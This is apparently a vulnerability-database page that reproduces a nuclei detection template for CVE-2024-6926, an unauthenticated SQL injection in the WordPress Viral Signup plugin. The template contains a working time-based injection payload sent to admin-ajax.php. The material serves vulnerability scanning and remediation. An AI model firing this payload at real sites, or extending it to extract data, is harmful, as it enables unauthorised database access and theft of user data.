Lucene search
K

Viral Signup <= 2.1 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Viral Signup plugin for WordPress <= 2.1 is prone to SQL Injection allowing unauthenticated attackers to extract sensitive information from the database

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6926
4 Sep 202409:22
circl
CNNVD
WordPress plugin Viral Signup 安全漏洞
4 Sep 202400:00
cnnvd
CVE
CVE-2024-6926
4 Sep 202406:00
cve
Cvelist
CVE-2024-6926 Viral Signup <= 2.1 - Unauthenticated SQLi
4 Sep 202406:00
cvelist
NVD
CVE-2024-6926
4 Sep 202406:15
nvd
OSV
CVE-2024-6926
4 Sep 202406:15
osv
Patchstack
WordPress Viral Signup plugin <= 2.1 - Unauthenticated SQLi vulnerability
4 Sep 202409:34
patchstack
Patchstack
WordPress Viral Signup Plugin <= 2.1 is vulnerable to SQL Injection
4 Sep 202400:00
patchstack
Positive Technologies
PT-2024-37964 · WordPress · Viral Signup
3 Sep 202400:00
ptsecurity
RedhatCVE
CVE-2024-6926
23 May 202510:30
redhatcve
Rows per page
id: CVE-2024-6926

info:
  name: Viral Signup <= 2.1 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The Viral Signup limited opt-in with viral referral sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to extract, modify, or delete sensitive database information, potentially gaining full control of the WordPress site and compromising user data.
  remediation: |
    Update Viral Signup plugin to a version later than 2.1 to address the SQL injection vulnerability.
  reference:
    - https://www.usom.gov.tr/bildirim/tr-24-1387
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/viral-signup/viral-signup-21-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6926
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6926
    epss-score: 0.03292
    epss-percentile: 0.86999
  metadata:
    max-request: 2
    vendor: viral-signup
    product: viral-signup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/viral-signup"
  tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/viral-signup")'
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100a2bdc9cecc5f30a5364c7aaabc266bbbc6b479347b1376981c59c1db8b97394b02205d59cb2ec9feb1ad1efc8142894b96166543bbe79aaa6db4218c7449f22318ff:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.03292
SSVC
24